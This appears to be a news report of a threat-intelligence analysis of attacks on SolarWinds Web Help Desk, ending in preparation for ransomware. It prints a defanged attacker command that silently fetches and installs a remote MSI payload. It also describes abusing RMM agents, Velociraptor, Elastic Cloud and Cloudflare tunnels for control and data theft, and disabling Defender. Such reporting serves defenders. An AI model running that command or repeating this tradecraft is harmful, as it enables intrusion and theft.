Security researchers warn of active attacks on SolarWinds Web Help Desk. Malicious actors are exploiting vulnerabilities to infiltrate systems and then deploy forensic tools as command-and-control infrastructure. The attack chain ends with preparing systems for ransomware deployment.
Huntress researchers observed attacks originating from a compromised SolarWinds Web Help Desk instance last week. The attack chain started with wrapper.exe, the WHD service wrapper, which launched java.exe. The Java process then launched cmd.exe to silently install an external MSI payload via the command msiexec /q /i hxxps://files.catbox[.]moe/tmp9fc.msi.
The attacker used Catbox to deploy a Zoho ManageEngine RMM agent. This legitimate remote management tool is often abused to gain access to compromised environments. The Zoho Assist agent was configured for unattended access, registering the compromised host with a Zoho Assist account linked to the Proton Mail address esmahyft@proton[.]me.
From RMM to forensic tools
Immediately after installing the RMM agent, the attacker began hands-on keyboard activity. Through the RMM agent process (TOOLSIQ.EXE), the attacker executed Active Directory discovery commands to inventory machines.
Shortly after the initial reconnaissance, the threat actor deployed Velociraptor on the compromised host. This open-source digital forensics and incident response tool was installed via a silent MSI execution from an attacker-controlled Supabase storage bucket.
Velociraptor is designed to assist defenders with endpoint monitoring and artifact collection. However, its remote command execution and process execution features via VQL queries make it just as effective as a C2 framework when pointing to attacker-controlled infrastructure.
Infrastructure with recognizable patterns
The attacker used Velociraptor version 0.73.4, an outdated version known to have a privilege-escalation vulnerability that has also been observed in previous campaigns. The Velociraptor server URL uses a Cloudflare Worker from the same Cloudflare account that was previously seen in multiple intrusions involving ToolShell exploitation and Warlock ransomware deployment.
With the Velociraptor agent installed as a Windows service, the attacker began executing a rapid series of encoded PowerShell commands. This pattern is consistent with Velociraptor’s standard method for executing PowerShell on endpoints, where commands are base64-encoded (UTF-16LE) to avoid issues with special characters.
Elastic Cloud as victim management dashboard
During the initial reconnaissance process, the attacker executed a PowerShell script that collected extensive system information and sent it directly to an attacker-controlled Elastic Cloud instance. The script runs the PowerShell cmdlet Get-ComputerInfo, which returns detailed system information, including OS version, hardware specifications, domain membership, and installed hotfixes.
The data is then formatted as NDJSON and pushed to an Elasticsearch systeminfo index via the Bulk API with a hardcoded API key. Using Elastic Cloud as a data collection backend is a notable tradecraft choice. The attacker has essentially built their own SIEM with Elastic. Each compromised system reports its full system profile to a centralized Elasticsearch instance that the operator can search at scale via Kibana.
The attacker then installed Cloudflare tunnels directly from the official GitHub release URL. This provides an additional tunnel-based channel in addition to the existing Velociraptor C2 connection.
After approximately 84 seconds, the attacker disabled security controls via registry changes. About a second after disabling Defender, the attacker downloaded a new copy of the VS Code binary from a Supabase bucket.